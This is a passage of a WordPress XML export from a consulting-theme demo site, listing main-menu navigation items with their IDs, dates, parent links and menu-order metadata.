		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1322]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>12</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[604]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1323/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1323/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1323</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1323]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>28</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[455]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1325/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1325/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1325</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1325]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>10</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[566]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1326/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1326/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1326</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1326]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>6</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[529]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1327/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1327/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1327</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1327]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>7</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[690]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1328/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1328/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1328</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1328]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>8</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[711]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1329/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1329/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1329</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1329]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>9</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1292]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[471]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1330/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1330/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1330</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1330]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>25</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1331/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1331/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1331</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1331]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>24</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1002]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1332/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1332/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1332</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1332]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>23</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[999]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1333/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1333/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1333</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1333]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>22</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1338]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[996]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/1334/</link>
		<pubDate>Mon, 19 Oct 2020 06:55:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/2020/10/19/1334/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1334</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 06:55:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 06:55:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1334]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>21</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
